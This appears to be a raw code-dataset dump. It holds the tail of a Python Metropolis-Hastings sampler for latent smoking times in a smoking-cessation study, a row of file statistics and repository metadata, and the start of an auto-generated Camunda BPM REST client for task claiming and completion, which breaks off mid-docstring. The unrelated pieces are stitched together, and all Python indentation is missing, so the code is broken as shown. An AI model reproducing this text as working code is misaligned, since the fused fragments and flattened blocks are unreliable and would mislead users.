'q_x_given_xprime':q_x_given_xprime,
'proposed_point':proposed_point}})
# Update dictionary for this person
dict_mh_ratio.update({current_participant:current_dict_mh_ratio})
# What is the likelihood at the proposed state?
proposed_state = get_for_all_current_state_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = tmp_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
new_dict_latent_data = copy.deepcopy(init_dict_latent_data)
for current_participant in all_participant_ids:
for current_day in all_days:
pi_x = current_state[current_participant][current_day]['pi_x']
pi_xprime = proposed_state[current_participant][current_day]['pi_x']
q_xprime_given_x = dict_mh_ratio[current_participant][current_day]['q_xprime_given_x']
q_x_given_xprime = dict_mh_ratio[current_participant][current_day]['q_x_given_xprime']
mh_ratio = (pi_xprime / pi_x) * (q_x_given_xprime / q_xprime_given_x)
acceptance_prob = np.min([1.0, mh_ratio])
decision = np.random.binomial(n=1, p=acceptance_prob, size=1)
decision = decision[0]
dict_mh_ratio[current_participant][current_day]['mh_ratio'] = mh_ratio
dict_mh_ratio[current_participant][current_day]['acceptance_prob'] = acceptance_prob
dict_mh_ratio[current_participant][current_day]['decision'] = decision * 1.0
dict_mh_ratio[current_participant][current_day]['pi_x'] = pi_x
dict_mh_ratio[current_participant][current_day]['pi_xprime'] = pi_xprime
dict_mh_ratio[current_participant][current_day]['x'] = new_dict_latent_data[current_participant][current_day]['hours_since_start_day']
dict_mh_ratio[current_participant][current_day]['xprime'] = proposed_state[current_participant][current_day]['x']
if decision == 1:
# We accept the proposal and update the latent smoking times accordingly
new_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_state[current_participant][current_day]['x']
new_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_state[current_participant][current_day]['x']))
#######################################################################
# if select_move==0, propose to delete a point
# dumb death pdf will be used as the proposal distribution
#######################################################################
else:
tmp_dict_latent_data = copy.deepcopy(init_dict_latent_data)
dict_mh_ratio = {}
for current_participant in all_participant_ids:
current_dict_mh_ratio = {}
for current_day in all_days:
grid_size = len(current_state[current_participant][current_day]['x'])
arr_probs = np.repeat(1/grid_size, grid_size)
selected_idx = np.random.choice(a = np.arange(grid_size), size=1, replace = True, p = arr_probs)
selected_idx = selected_idx[0]
proposed_point = current_state[current_participant][current_day]['x'][selected_idx]
proposed_set = np.delete(arr = current_state[current_participant][current_day]['x'], obj = selected_idx)
tmp_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_set
tmp_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_set))
# Finally, collect results
q_xprime_given_x = 1/grid_size
q_x_given_xprime = -99 # Place holder value; modify this at a later step below
current_dict_mh_ratio.update({current_day:{'select_combo':select_combo,
'select_move':select_move,
'q_xprime_given_x':q_xprime_given_x,
'q_x_given_xprime':q_x_given_xprime,
'proposed_point':proposed_point}})
# Update dictionary for this person
dict_mh_ratio.update({current_participant:current_dict_mh_ratio})
# What is the likelihood at the proposed state?
proposed_state = get_for_all_current_state_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = tmp_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
# Calculate likelihood for each point on the grid
# Note the use of tmp_dict_latent_data
smart_birth_lik = get_for_all_smart_birth_lik(use_increment = 1/60,
all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = tmp_dict_latent_data, # note this one; this is the configuration of points after proposed deletion
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
# Complete calculation of smart birth pdf
dict_smart_birth_pdf = get_for_all_smart_birth_pdf(dict_smart_birth_lik = smart_birth_lik, dict_current_state = proposed_state)
# Now, calculate q_x_given_xprime
for current_participant in all_participant_ids:
for current_day in all_days:
this_point = dict_mh_ratio[current_participant][current_day]['proposed_point']
all_possible_points = dict_smart_birth_pdf['dict_smart_birth_pdf'][current_participant][current_day]['grid']
this_idx = np.max(np.where(this_point - all_possible_points > 0)) # What is the closest point prior to this_point?
dict_mh_ratio[current_participant][current_day]['q_x_given_xprime'] = dict_smart_birth_pdf['dict_smart_birth_pdf'][current_participant][current_day]['pdf_smart_birth'][this_idx]
new_dict_latent_data = copy.deepcopy(init_dict_latent_data)
for current_participant in all_participant_ids:
for current_day in all_days:
pi_x = current_state[current_participant][current_day]['pi_x']
pi_xprime = proposed_state[current_participant][current_day]['pi_x']
q_xprime_given_x = dict_mh_ratio[current_participant][current_day]['q_xprime_given_x']
q_x_given_xprime = dict_mh_ratio[current_participant][current_day]['q_x_given_xprime']
mh_ratio = (pi_xprime / pi_x) * (q_x_given_xprime / q_xprime_given_x)
acceptance_prob = np.min([1.0, mh_ratio])
decision = np.random.binomial(n=1, p=acceptance_prob, size=1)
decision = decision[0]
dict_mh_ratio[current_participant][current_day]['mh_ratio'] = mh_ratio
dict_mh_ratio[current_participant][current_day]['acceptance_prob'] = acceptance_prob
dict_mh_ratio[current_participant][current_day]['decision'] = decision * 1.0
dict_mh_ratio[current_participant][current_day]['pi_x'] = pi_x
dict_mh_ratio[current_participant][current_day]['pi_xprime'] = pi_xprime
dict_mh_ratio[current_participant][current_day]['x'] = new_dict_latent_data[current_participant][current_day]['hours_since_start_day']
dict_mh_ratio[current_participant][current_day]['xprime'] = proposed_state[current_participant][current_day]['x']
if decision == 1:
# we accept the proposal and update the latent smoking times accordingly
new_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_state[current_participant][current_day]['x']
new_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_state[current_participant][current_day]['x']))
# -------------------------------------------------------------------------
# Choose a smart death but dumb birth combo
# -------------------------------------------------------------------------
else:
select_move = np.random.binomial(n=1, p=0.5, size=1)
select_move = select_move[0] * 1.0
#######################################################################
# if select_move==1, propose to delete a point
# smart death pdf will be used as the proposal distribution
#######################################################################
if select_move == 1:
smart_death_lik = get_for_all_smart_death_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = init_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.9, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.9, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
dict_smart_death_pdf = get_for_all_smart_death_pdf(dict_smart_death_lik = smart_death_lik, dict_current_state = current_state)
# This is simply a placeholder dictionary for containing proposed new configuration of points
tmp_dict_latent_data = copy.deepcopy(init_dict_latent_data)
dict_mh_ratio = {}
for current_participant in all_participant_ids:
current_dict_mh_ratio = {}
for current_day in all_days:
arr_probs = dict_smart_death_pdf['dict_smart_death_pdf'][current_participant][current_day]['pdf_smart_death']
grid_size = len(arr_probs)
selected_idx = np.random.choice(a = np.arange(grid_size), size=1, replace = True, p = arr_probs)
selected_idx = selected_idx[0]
proposed_point = dict_smart_death_pdf['dict_smart_death_pdf'][current_participant][current_day]['grid'][selected_idx]
proposed_set = dict_smart_death_pdf['dict_smart_death_pdf'][current_participant][current_day]['proposed_latent_smoking_times'][selected_idx]
tmp_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_set
tmp_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_set))
q_xprime_given_x = dict_smart_death_pdf['dict_smart_death_pdf'][current_participant][current_day]['pdf_smart_death'][selected_idx]
# Now, prepare to calculate q_x_given_xprime
tmp_grid_dumb_birth = construct_grid(increment=1/60, day_length=tmp_dict_latent_data[current_participant][current_day]['day_length'])
# We should not birth points that already exist
# Note that the points within proposed_set comes AFTER deletion of a point
grid_dumb_birth = np.setdiff1d(ar1 = tmp_grid_dumb_birth, ar2 = proposed_set)
q_x_given_xprime = 1/len(grid_dumb_birth)
current_dict_mh_ratio.update({current_day:{'select_combo':select_combo,
'select_move':select_move,
'q_xprime_given_x':q_xprime_given_x,
'q_x_given_xprime':q_x_given_xprime,
'proposed_point':proposed_point}})
# Update dictionary for this person
dict_mh_ratio.update({current_participant:current_dict_mh_ratio})
# What is the likelihood at the proposed state?
proposed_state = get_for_all_current_state_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = tmp_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
# Create a placeholder dictionary
new_dict_latent_data = copy.deepcopy(init_dict_latent_data)
for current_participant in all_participant_ids:
for current_day in all_days:
pi_x = current_state[current_participant][current_day]['pi_x']
pi_xprime = proposed_state[current_participant][current_day]['pi_x']
q_xprime_given_x = dict_mh_ratio[current_participant][current_day]['q_xprime_given_x']
q_x_given_xprime = dict_mh_ratio[current_participant][current_day]['q_x_given_xprime']
mh_ratio = (pi_xprime / pi_x) * (q_x_given_xprime / q_xprime_given_x)
acceptance_prob = np.min([1.0, mh_ratio])
decision = np.random.binomial(n=1, p=acceptance_prob, size=1)
decision = decision[0]*1.0
dict_mh_ratio[current_participant][current_day]['mh_ratio'] = mh_ratio
dict_mh_ratio[current_participant][current_day]['acceptance_prob'] = acceptance_prob
dict_mh_ratio[current_participant][current_day]['decision'] = decision
dict_mh_ratio[current_participant][current_day]['pi_x'] = pi_x
dict_mh_ratio[current_participant][current_day]['pi_xprime'] = pi_xprime
dict_mh_ratio[current_participant][current_day]['x'] = new_dict_latent_data[current_participant][current_day]['hours_since_start_day']
dict_mh_ratio[current_participant][current_day]['xprime'] = proposed_state[current_participant][current_day]['x']
if decision == 1:
# if decision==1, we accept the proposal and update the latent smoking times accordingly
new_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_state[current_participant][current_day]['x']
new_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_state[current_participant][current_day]['x']))
#######################################################################
# If select_move==0, propose to add a point
# a dumb birth pdf will be used as the proposal distribution
#######################################################################
else:
dict_mh_ratio = {}
# This is simply a placeholder dictionary
tmp_dict_latent_data = copy.deepcopy(init_dict_latent_data)
for current_participant in all_participant_ids:
current_dict_mh_ratio = {}
for current_day in all_days:
tmp_grid_dumb_birth = construct_grid(increment=1/60, day_length=tmp_dict_latent_data[current_participant][current_day]['day_length'])
existing_points = tmp_dict_latent_data[current_participant][current_day]['hours_since_start_day']
# We should not propose to add existing points
grid_dumb_birth = np.setdiff1d(ar1 = tmp_grid_dumb_birth, ar2 = existing_points)
arr_probs = np.repeat(1/len(grid_dumb_birth), len(grid_dumb_birth))
selected_idx = np.random.choice(a = np.arange(len(grid_dumb_birth)), size=1, replace = True, p = arr_probs)
selected_idx = selected_idx[0]
proposed_point = grid_dumb_birth[selected_idx]
proposed_set = np.sort(np.append(existing_points, proposed_point))
tmp_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_set
tmp_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_set))
q_xprime_given_x = 1/len(grid_dumb_birth)
q_x_given_xprime = -99 # use a placeholder value; update this later on
current_dict_mh_ratio.update({current_day:{'select_combo':select_combo,
'select_move':select_move,
'q_xprime_given_x':q_xprime_given_x,
'q_x_given_xprime':q_x_given_xprime,
'proposed_point':proposed_point}})
# Update dictionary for this person
dict_mh_ratio.update({current_participant:current_dict_mh_ratio})
# What is the likelihood at the proposed state?
proposed_state = get_for_all_current_state_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = tmp_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
smart_death_lik = get_for_all_smart_death_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = tmp_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.9, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.9, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
dict_smart_death_pdf = get_for_all_smart_death_pdf(dict_smart_death_lik = smart_death_lik, dict_current_state = proposed_state)
for current_participant in all_participant_ids:
for current_day in all_days:
this_point = dict_mh_ratio[current_participant][current_day]['proposed_point']
this_idx = np.where(proposed_state[current_participant][current_day]['x'] == this_point)
this_idx = this_idx[0][0]
dict_mh_ratio[current_participant][current_day]['q_x_given_xprime'] = dict_smart_death_pdf['dict_smart_death_pdf'][current_participant][current_day]['pdf_smart_death'][this_idx]
new_dict_latent_data = copy.deepcopy(init_dict_latent_data)
for current_participant in all_participant_ids:
for current_day in all_days:
pi_x = current_state[current_participant][current_day]['pi_x']
pi_xprime = proposed_state[current_participant][current_day]['pi_x']
q_xprime_given_x = dict_mh_ratio[current_participant][current_day]['q_xprime_given_x']
q_x_given_xprime = dict_mh_ratio[current_participant][current_day]['q_x_given_xprime']
mh_ratio = (pi_xprime / pi_x) * (q_x_given_xprime / q_xprime_given_x)
acceptance_prob = np.min([1.0, mh_ratio])
decision = np.random.binomial(n=1, p=acceptance_prob, size=1)
decision = decision[0]
dict_mh_ratio[current_participant][current_day]['mh_ratio'] = mh_ratio
dict_mh_ratio[current_participant][current_day]['acceptance_prob'] = acceptance_prob
dict_mh_ratio[current_participant][current_day]['decision'] = decision * 1.0
dict_mh_ratio[current_participant][current_day]['x'] = new_dict_latent_data[current_participant][current_day]['hours_since_start_day']
dict_mh_ratio[current_participant][current_day]['xprime'] = proposed_state[current_participant][current_day]['x']
if decision == 1:
# we accept the proposal and update the latent smoking times accordingly
new_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_state[current_participant][current_day]['x']
new_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_state[current_participant][current_day]['x']))
# END OF CURRENT ITERATION
# Note: latent data will be updated per iteration for all participant days
# Store those updates so that we can see how the configuration changes with each pass
all_iter_dict_mh_ratio.update({current_iter:dict_mh_ratio})
# The final step: specify the latent smoking times we will work with at the beginning of the next iteration
init_dict_latent_data = copy.deepcopy(new_dict_latent_data)
# %%
# Plot an example
current_participant = all_participant_ids[0] #None
current_day = all_days[0] #None
for current_iter in np.arange(total_iter):
print(all_iter_dict_mh_ratio[current_iter][current_participant][current_day]['x'])
# %%
total_accept = 0
for current_iter in np.arange(total_iter):
total_accept += all_iter_dict_mh_ratio[current_iter][current_participant][current_day]['decision']
print(total_accept/total_iter)
# %%
for current_iter in np.arange(total_iter):
current_latent_smoking_times = all_iter_dict_mh_ratio[current_iter][current_participant][current_day]['x']
# Preparation for plotting observed measurements -- end of day survey
any_eod_survey = init_dict_observed_eod_survey[current_participant][current_day]['assessment_begin']
current_checked_boxes_eod_survey = init_dict_observed_eod_survey[current_participant][current_day]['ticked_box_scaled']
# Preparation for plotting observed measurements -- ema
if len(init_dict_observed_ema[current_participant][current_day]['assessment_type'])>0:
idx_selfreport = np.where(init_dict_observed_ema[current_participant][current_day]['assessment_type']=='selfreport')
idx_random_ema = np.where(init_dict_observed_ema[current_participant][current_day]['assessment_type']=='random_ema')
current_selfreport_ema = init_dict_observed_ema[current_participant][current_day]['assessment_begin'][idx_selfreport]
current_random_ema = init_dict_observed_ema[current_participant][current_day]['assessment_begin'][idx_random_ema]
current_random_ema_responses = init_dict_observed_ema[current_participant][current_day]['smoke'][idx_random_ema]
else:
current_selfreport_ema = np.array([])
current_random_ema = np.array([])
current_random_ema_responses = np.array([])
# Show plot
current_day_length = np.max(init_dict_latent_data[current_participant][current_day]['day_length'])
plt.xticks(np.arange(0, current_day_length+1, 1.0))
plt.yticks(np.arange(0,1.1,0.1))
plt.xlim(-0.20,current_day_length+1.5)
if len(current_latent_smoking_times)>0:
plt.scatter(current_latent_smoking_times, np.repeat(-0.07, len(current_latent_smoking_times)), c = 'black', s=35, marker = 'o', label='Current Latent Smoking Times')
if len(current_selfreport_ema)>0:
plt.scatter(current_selfreport_ema, np.repeat(-0.18, len(current_selfreport_ema)), s=30, marker = '^', c = 'orange', label='Self-Report EMA')
if len(current_random_ema)>0:
plt.scatter(current_random_ema, np.repeat(-0.18, len(current_random_ema)), s=30, marker = '^', c = 'blue', label='Random EMA')
for idx in range(0, len(current_random_ema)):
plt.text(current_random_ema[idx], -0.28, current_random_ema_responses[idx], ha = 'center')
if len(any_eod_survey) > 0 and len(current_checked_boxes_eod_survey)==0:
plt.text(0,-0.35,"End of Day Survey Completed but No Boxes Checked", ha = 'left')
elif len(any_eod_survey)==0:
plt.text(0,-0.35,"End of Day Survey Not Completed", ha = 'left')
else:
pass
if len(current_checked_boxes_eod_survey)>0:
list_seg = []
for idx in range(0, len(current_checked_boxes_eod_survey)):
lower_lim = current_checked_boxes_eod_survey[idx]
upper_lim = lower_lim + 1
plt.scatter(lower_lim, -.13, marker = '|', s=30, c='g')
plt.scatter(upper_lim, -.13, marker = '|', s=30, c='g')
list_seg.append((lower_lim, upper_lim))
list_seg.append((-.13,-.13))
list_seg.append('g')
plt.plot(*list_seg)
plt.xlabel('Hours Elapsed Since Start of Day')
plt.ylabel('')
plt.yticks([])
plt.ylim(bottom=-0.40, top=0.10)
plt.text(current_day_length, 0.06, 'Iteration # {}'.format(current_iter), ha = 'right')
plt.legend(loc='upper left', prop={'size': 9})
plt.savefig(os.path.join(os.path.realpath(dir_picklejar), 'plot_current_smoking_times', 'current_smoking_times_{}_{}_iter_{}.jpg'.format(current_participant, current_day, current_iter)))
plt.clf()
# %%
filename = os.path.join(os.path.realpath(dir_picklejar), 'plot_current_smoking_times', 'all_iter_dict_mh_ratio')
outfile = open(filename, 'wb')
pickle.dump(all_iter_dict_mh_ratio, outfile)
outfile.close()
# %%
| 58.678515 | 201 | 0.586796 | 12,736 | 112,252 | 4.773791 | 0.045854 | 0.038159 | 0.056646 | 0.071843 | 0.848665 | 0.821839 | 0.79873 | 0.776164 | 0.755177 | 0.739617 | 0 | 0.010384 | 0.329945 | 112,252 | 1,913 | 202 | 58.678515 | 0.797953 | 0.12039 | 0 | 0.703554 | 0 | 0 | 0.066935 | 0.024876 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026656 | false | 0.001616 | 0.008078 | 0 | 0.057351 | 0.001616 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
efed2aac7ba71ce3c8b140e94ac605fc04541390 | 244,799 | py | Python | openapi-python-client/openapi_client/api/task_api.py | yanavasileva/camunda-bpm-examples | 051f8f28c62845e68ce4059ab64264c5a0bdc009 | [
"Apache-2.0"
] | null | null | null | openapi-python-client/openapi_client/api/task_api.py | yanavasileva/camunda-bpm-examples | 051f8f28c62845e68ce4059ab64264c5a0bdc009 | [
"Apache-2.0"
] | null | null | null | openapi-python-client/openapi_client/api/task_api.py | yanavasileva/camunda-bpm-examples | 051f8f28c62845e68ce4059ab64264c5a0bdc009 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Camunda BPM REST API
OpenApi Spec for Camunda BPM REST API. # noqa: E501
The version of the OpenAPI document: 7.13.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from openapi_client.api_client import ApiClient
from openapi_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class TaskApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def claim(self, id, **kwargs): # noqa: E501
"""claim # noqa: E501
Claims a task for a specific user. **Note:** The difference with the [Set Assignee](https://docs.camunda.org/manual/7.13/reference/rest/task/post-assignee/) method is that here a check is performed to see if the task already has a user assigned to it. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.claim(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to claim. (required)
:param UserIdDto user_id_dto: Provide the id of the user that claims the task.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.claim_with_http_info(id, **kwargs) # noqa: E501
def claim_with_http_info(self, id, **kwargs): # noqa: E501
"""claim # noqa: E501
Claims a task for a specific user. **Note:** The difference with the [Set Assignee](https://docs.camunda.org/manual/7.13/reference/rest/task/post-assignee/) method is that here a check is performed to see if the task already has a user assigned to it. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.claim_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to claim. (required)
:param UserIdDto user_id_dto: Provide the id of the user that claims the task.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'user_id_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method claim" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `claim`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_id_dto' in local_var_params:
body_params = local_var_params['user_id_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/claim', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def complete(self, id, **kwargs): # noqa: E501
"""complete # noqa: E501
Completes a task and updates process variables. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.complete(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to complete. (required)
:param CompleteTaskDto complete_task_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: dict(str, VariableValueDto)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.complete_with_http_info(id, **kwargs) # noqa: E501
def complete_with_http_info(self, id, **kwargs): # noqa: E501
"""complete # noqa: E501
Completes a task and updates process variables. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.complete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to complete. (required)
:param CompleteTaskDto complete_task_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(dict(str, VariableValueDto), status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'complete_task_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method complete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `complete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'complete_task_dto' in local_var_params:
body_params = local_var_params['complete_task_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/complete', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, VariableValueDto)', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_task(self, **kwargs): # noqa: E501
"""create_task # noqa: E501
Creates a new task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_task(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param TaskDto task_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_task_with_http_info(**kwargs) # noqa: E501
def create_task_with_http_info(self, **kwargs): # noqa: E501
"""create_task # noqa: E501
Creates a new task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_task_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param TaskDto task_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
